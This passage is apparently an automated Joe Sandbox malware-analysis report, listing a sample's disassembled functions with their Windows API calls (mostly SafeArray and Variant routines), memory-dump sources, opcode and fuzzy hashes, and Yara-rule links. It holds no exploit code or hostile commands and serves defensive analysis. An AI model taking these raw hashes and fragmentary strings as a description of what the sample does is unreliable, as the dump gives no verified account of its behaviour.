                                                          control_flow_graph 1598 6cf7840e-6cf78413 call 6cfcc1e0 1600 6cf78418-6cf7841f 1598->1600 1688 6cf78422 call 133d149 1600->1688 1689 6cf78422 call 133d148 1600->1689 1601 6cf78424-6cf78426 1602 6cf7ae53-6cf7ae60 1601->1602 1603 6cf7842c-6cf78443 call 6cf6dfb0 1601->1603 1604 6cf7ae62-6cf7ae65 SafeArrayDestroy 1602->1604 1605 6cf7ae68-6cf7ae70 1602->1605 1603->1602 1612 6cf78449-6cf78454 1603->1612 1604->1605 1608 6cf7ae72-6cf7ae75 SafeArrayDestroy 1605->1608 1609 6cf7ae7b-6cf7ae83 1605->1609 1608->1609 1610 6cf7ae85-6cf7ae88 SafeArrayDestroy 1609->1610 1611 6cf7ae8e-6cf7ae96 1609->1611 1610->1611 1613 6cf7aea1-6cf7aea9 1611->1613 1614 6cf7ae98-6cf7ae9b SafeArrayDestroy 1611->1614 1615 6cf78456-6cf78461 1612->1615 1616 6cf78464-6cf7846f 1612->1616 1619 6cf7aeb4-6cf7aebc 1613->1619 1620 6cf7aeab-6cf7aeae SafeArrayDestroy 1613->1620 1614->1613 1615->1616 1617 6cf78471-6cf7847c 1616->1617 1618 6cf7847f-6cf78487 1616->1618 1617->1618 1621 6cf78493-6cf784a9 1618->1621 1622 6cf78489-6cf7848e call 6cfcc1e0 1618->1622 1623 6cf7aec7-6cf7aed3 1619->1623 1624 6cf7aebe-6cf7aec1 SafeArrayDestroy 1619->1624 1620->1619 1621->1602 1630 6cf784af-6cf784e7 SafeArrayGetLBound SafeArrayGetUBound 1621->1630 1622->1621 1626 6cf7aed5-6cf7aeda 1623->1626 1627 6cf7aedd-6cf7aef8 call 6cfb948b 1623->1627 1624->1623 1626->1627 1632 6cf78616-6cf7862d call 6cf6dfb0 1630->1632 1633 6cf784ed-6cf78512 SafeArrayGetElement 1630->1633 1632->1602 1643 6cf78633-6cf7864d call 6cf6dfb0 1632->1643 1635 6cf78758-6cf78761 1633->1635 1636 6cf78518-6cf78523 1633->1636 1635->1602 1637 6cf78767-6cf7876f 1635->1637 1639 6cf78525-6cf78528 1636->1639 1640 6cf7852d-6cf7853b 1636->1640 1637->1602 1639->1640 1641 6cf78545-6cf7855a 1640->1641 1642 6cf7853d-6cf78542 1640->1642 1644 6cf78564-6cf78582 call 6cf73a90 1641->1644 1645 6cf7855c-6cf78561 1641->1645 1642->1641 1643->1602 1651 6cf78653-6cf7866d call 6cf6dfb0 1643->1651 1652 6cf78584-6cf7858d 1644->1652 1653 6cf7858f-6cf785ab call 6cf73a90 1644->1653 1645->1644 1651->1602 1658 6cf78673-6cf7868c call 6cf6dfb0 1651->1658 1655 6cf785b6-6cf785b9 call 6cf6ad80 1652->1655 1662 6cf785be-6cf785f6 call 6cfba1f7 * 2 1653->1662 1663 6cf785ad-6cf785b0 1653->1663 1655->1662 1658->1602 1667 6cf78692-6cf786ac call 6cf6dfb0 1658->1667 1672 6cf78600-6cf78610 1662->1672 1673 6cf785f8-6cf785fd 1662->1673 1663->1655 1667->1602 1674 6cf786b2-6cf786d1 call 6cf769c0 1667->1674 1672->1632 1672->1633 1673->1672 1674->1602 1677 6cf786d7-6cf786f7 call 6cf769c0 1674->1677 1677->1602 1680 6cf786fd-6cf7870b 1677->1680 1681 6cf78715-6cf78753 call 6cf769c0 call 6cfba1f7 1680->1681 1682 6cf7870d-6cf78712 1680->1682 1681->1602 1682->1681 1688->1601 1689->1601
                                                          APIs
                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CF784BF
                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CF784D2
                                                          • SafeArrayGetElement.OLEAUT32 ref: 6CF7850A
                                                            • Part of subcall function 6CF73A90: SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CF73B71
                                                            • Part of subcall function 6CF73A90: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CF73B83
                                                            • Part of subcall function 6CF769C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6CF76A08
                                                            • Part of subcall function 6CF769C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CF76A15
                                                            • Part of subcall function 6CF769C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CF76A41
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE63
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE73
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE86
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE99
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AEAC
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AEBF
                                                            • Part of subcall function 6CF6DFB0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6CF6DFF6
                                                            • Part of subcall function 6CF6DFB0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CF6E003
                                                            • Part of subcall function 6CF6DFB0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CF6E02F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ArraySafe$Bound$Destroy$Element
                                                          • String ID:
                                                          • API String ID: 959723449-0
                                                          • Opcode ID: 39bbdbbab3ac90d1d3d4e3e6a63f8884fbde095131b74e729cb6b5ddcee34479
                                                          • Instruction ID: d4fcb1733ba359da6032beecf854e75071a6cf932bb29b755971277c17718e05
                                                          • Opcode Fuzzy Hash: 39bbdbbab3ac90d1d3d4e3e6a63f8884fbde095131b74e729cb6b5ddcee34479
                                                          • Instruction Fuzzy Hash: BCC19170A012049FDB24CF69DC94FADB7B9AF45308F20859AE519EB786C771ED44CB60
                                                          Function 6CF74170 Relevance: 13.8, APIs: 9, Instructions: 277COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VariantInit.OLEAUT32(?), ref: 6CF741AF
                                                          • VariantInit.OLEAUT32(?), ref: 6CF741B5
                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CF741C0
                                                          • SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6CF741F5
                                                          • VariantClear.OLEAUT32(?), ref: 6CF74201
                                                          • std::tr1::_Xweak.LIBCPMT ref: 6CF74450
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7446D
                                                          • VariantClear.OLEAUT32(?), ref: 6CF7447D
                                                          • VariantClear.OLEAUT32(?), ref: 6CF74483
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: Variant$ArrayClearSafe$Init$CreateDestroyElementVectorXweakstd::tr1::_
                                                          • String ID:
                                                          • API String ID: 1774866819-0
                                                          • Opcode ID: 53774acc9b80aa52cc32bc91ec1b2ab88988c479b55e9373a1568eb146b8a722
                                                          • Instruction ID: 36cdf00914c0c895af7c9333d952e518b05fc07510bf2011e412d17927f01638
                                                          • Opcode Fuzzy Hash: 53774acc9b80aa52cc32bc91ec1b2ab88988c479b55e9373a1568eb146b8a722
                                                          • Instruction Fuzzy Hash: 89B13A756006099FCB24DF99C884EEAB7F5BF8D310F15856DE50AABB90DA34F841CB60
                                                          Function 6CF7C530 Relevance: 13.8, APIs: 9, Instructions: 259COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VariantInit.OLEAUT32(?), ref: 6CF7C56F
                                                          • VariantInit.OLEAUT32(?), ref: 6CF7C575
                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CF7C580
                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CF7C5B5
                                                          • VariantClear.OLEAUT32(?), ref: 6CF7C5C1
                                                          • std::tr1::_Xweak.LIBCPMT ref: 6CF7C7D4
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7C7F1
                                                          • VariantClear.OLEAUT32(?), ref: 6CF7C801
                                                          • VariantClear.OLEAUT32(?), ref: 6CF7C807
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: Variant$ArrayClearSafe$Init$CreateDestroyElementVectorXweakstd::tr1::_
                                                          • String ID:
                                                          • API String ID: 1774866819-0
                                                          • Opcode ID: 6774862f343270b2dee28c13bfcfbfe42b381c429eaebc39aaea6f0aa94ea4ae
                                                          • Instruction ID: a5f30365130736ece7e6723eab49ba8665a4b8ca3b50bd83899626c64a26dd15
                                                          • Opcode Fuzzy Hash: 6774862f343270b2dee28c13bfcfbfe42b381c429eaebc39aaea6f0aa94ea4ae
                                                          • Instruction Fuzzy Hash: 2FA13975A006099FCB24DFA9C884EAAB7F5BF8D310F15856DE506ABB50DB34F841CB60
                                                          Function 6CF76880 Relevance: 13.6, APIs: 9, Instructions: 117COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VariantInit.OLEAUT32(?), ref: 6CF768B2
                                                          • VariantInit.OLEAUT32(?), ref: 6CF768BD
                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6CF768D7
                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CF768FD
                                                          • VariantClear.OLEAUT32(?), ref: 6CF76909
                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CF76923
                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6CF76981
                                                          • VariantClear.OLEAUT32(?), ref: 6CF7699E
                                                          • VariantClear.OLEAUT32(?), ref: 6CF769A4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: Variant$ArraySafe$Clear$ElementInit$CreateDestroyVector
                                                          • String ID:
                                                          • API String ID: 3529038988-0
                                                          • Opcode ID: 9f502c77e2b9a67b1e0a68de241a72b6d7a658f9f8f3848b861e99ba50252de7
                                                          • Instruction ID: 646b075ebcdbbeea14eaec7ffaf0e03edc5fd35ef09d15084eb34ab9cee27f7c
                                                          • Opcode Fuzzy Hash: 9f502c77e2b9a67b1e0a68de241a72b6d7a658f9f8f3848b861e99ba50252de7
                                                          • Instruction Fuzzy Hash: FD416EB2E00219AFDB01DFA5C844AEFBBB8FF99314F15411AE905E7340E775A905CBA1
                                                          Function 6CF6C020 Relevance: 12.3, APIs: 8, Instructions: 309COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearInit
                                                          • String ID:
                                                          • API String ID: 2610073882-0
                                                          • Opcode ID: caf92560943126ce6012a1854edb3f92b45e59d28de2edf77ffcd2712345663e
                                                          • Instruction ID: cc92bff15dade87f5935f3e70514a73f2e37bae7e31be13e57774843aa6f96a0
                                                          • Opcode Fuzzy Hash: caf92560943126ce6012a1854edb3f92b45e59d28de2edf77ffcd2712345663e
                                                          • Instruction Fuzzy Hash: 73C136716087019FC700EF69C88095BB7E5FFC9308F258A4DE99897B65D731E845CB92
                                                          Function 6CF76B10 Relevance: 9.4, APIs: 6, Instructions: 364COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SafeArrayGetLBound.OLEAUT32(00000000,?,?), ref: 6CF76C8B
                                                          • SafeArrayGetUBound.OLEAUT32(00000000,?,?), ref: 6CF76CA6
                                                          • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 6CF76CC7
                                                            • Part of subcall function 6CF75760: std::tr1::_Xweak.LIBCPMT ref: 6CF75769
                                                          • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6CF76CF9
                                                            • Part of subcall function 6CFB9BB5: _malloc.LIBCMT ref: 6CFB9BCF
                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6CF76F13
                                                          • InterlockedCompareExchange.KERNEL32(6CFFC6A4,45524548,4B4F4F4C), ref: 6CF76F34
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ArraySafe$BoundData$AccessCompareDestroyExchangeInterlockedUnaccessXweak_mallocstd::tr1::_
                                                          • String ID:
                                                          • API String ID: 2722669376-0
                                                          • Opcode ID: 2378b2385d8c90e89118058ab8bb460f2e1196416d2ffcf27e654df2c08ebdec
                                                          • Instruction ID: eb5d76b7eadb945736c2cb5f6891d9e7511776c48a950e2adc25a3cf167245a9
                                                          • Opcode Fuzzy Hash: 2378b2385d8c90e89118058ab8bb460f2e1196416d2ffcf27e654df2c08ebdec
                                                          • Instruction Fuzzy Hash: 3FD1BEB1A102099FDB20CFA4D884BEE77B8EF44308F14846AE515EBB81D775E9048BA1
                                                          Function 6CF616B0 Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 487COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 6CFB9BB5: _malloc.LIBCMT ref: 6CFB9BCF
                                                          • std::tr1::_Xweak.LIBCPMT ref: 6CF61B53
                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6CF61B5D
                                                          • std::exception::exception.LIBCMT ref: 6CF61C43
                                                          • __CxxThrowException@8.LIBCMT ref: 6CF61C58
                                                          Strings
                                                          • invalid vector<T> subscript, xrefs: 6CF61B58
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: Exception@8ThrowXinvalid_argumentXweak_mallocstd::_std::exception::exceptionstd::tr1::_
                                                          • String ID: invalid vector<T> subscript
                                                          • API String ID: 3098024973-3016609489
                                                          • Opcode ID: c6cddee488e433679a30acbb441896de2d7bd84b3a54f555a5944b05370957b2
                                                          • Instruction ID: 7a5094ac0c45eb8f0ea8cd3f9db3d62500214a27e8823ae16b398414d4b332a2
                                                          • Opcode Fuzzy Hash: c6cddee488e433679a30acbb441896de2d7bd84b3a54f555a5944b05370957b2
                                                          • Instruction Fuzzy Hash: C4222B75C007099FCB14CFA5C4809EEBBF5BF44314F158A6DD45AABB50E774AA88CB90
                                                          Function 03392B8F Relevance: 7.8, Strings: 6, Instructions: 333COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1650111319.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3390000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (o^q$(o^q$,bq$,bq$Hbq$d8cq
                                                          • API String ID: 0-1626189073
                                                          • Opcode ID: 22cf6bd00c00efb64f1cc15fc8e84b3138c34fb4e726d5ba89acc59df56d57ae
                                                          • Instruction ID: 1922bdfa803ab5add667e451b33323c84b3a772324e54b16942ef5d533f2a73f
                                                          • Opcode Fuzzy Hash: 22cf6bd00c00efb64f1cc15fc8e84b3138c34fb4e726d5ba89acc59df56d57ae
                                                          • Instruction Fuzzy Hash: 21C14E34B00518DFDB14EF68D994AAE7BBABF88714F14846AE405DB3A5CB35DC41CB90
                                                          Function 6CF6DB30 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VariantInit.OLEAUT32(6CF731EC), ref: 6CF6DB5E
                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CF6DB6E
                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CF6DB82
                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6CF6DBF1
                                                          • VariantClear.OLEAUT32(?), ref: 6CF6DBFB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ArraySafe$Variant$ClearCreateDestroyElementInitVector
                                                          • String ID:
                                                          • API String ID: 182531043-0
                                                          • Opcode ID: a6c78b17248af4dd2a714d1d3d78b9b7e55521bb81924cc9615a9381a486a78d
                                                          • Instruction ID: 686d78cd5f26a7f91159112a9261267adb367545b572c47b8ea840117923f036
                                                          • Opcode Fuzzy Hash: a6c78b17248af4dd2a714d1d3d78b9b7e55521bb81924cc9615a9381a486a78d
                                                          • Instruction Fuzzy Hash: D731B476A00205AFD701DF65C848EEEBBF8FF8A710F15815AE911A7740D734A801CBA0
                                                          Function 6CFBA42D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: T@12
                                                          • String ID: a0
                                                          • API String ID: 456891419-3188653782
                                                          • Opcode ID: 2d91f40ad9ae8956ff74fac67e559b963bbfaaae65b480aea99b2d1c15df3f98
                                                          • Instruction ID: 0794f1d07f807970f64e237a7f67c81f5aa5a5893fef189b80b118ee7459203e
                                                          • Opcode Fuzzy Hash: 2d91f40ad9ae8956ff74fac67e559b963bbfaaae65b480aea99b2d1c15df3f98
                                                          • Instruction Fuzzy Hash: 27112770D11252EADB309A778C4CFAFFAFC9B82758F109415A425F6990E734C945CAA0
                                                          Function 6CFB9BB5 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _malloc.LIBCMT ref: 6CFB9BCF
                                                            • Part of subcall function 6CFB9D66: __FF_MSGBANNER.LIBCMT ref: 6CFB9D7F
                                                            • Part of subcall function 6CFB9D66: __NMSG_WRITE.LIBCMT ref: 6CFB9D86
                                                            • Part of subcall function 6CFB9D66: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,00000000,?,6CFB9BD4,6CF51290,CA0C7769), ref: 6CFB9DAB
                                                          • std::exception::exception.LIBCMT ref: 6CFB9C04
                                                          • std::exception::exception.LIBCMT ref: 6CFB9C1E
                                                          • __CxxThrowException@8.LIBCMT ref: 6CFB9C2F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
